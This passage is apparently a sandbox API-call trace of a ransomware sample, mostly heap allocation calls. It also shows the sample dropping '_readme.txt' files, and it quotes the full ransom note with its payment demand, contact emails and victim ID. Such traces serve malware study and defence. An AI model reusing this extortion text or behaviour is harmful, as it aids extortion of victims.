0x2d154b0 [0174.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.291] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0174.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.291] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.292] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.292] PathFindFileNameW (pszPath="") returned="" [0174.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.292] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.292] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.292] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.293] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.293] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0174.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.293] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0174.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.293] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.293] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.294] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.296] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.297] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.297] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.297] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.297] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.298] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.303] HeapFree (in: hHeap=0x6a0000, 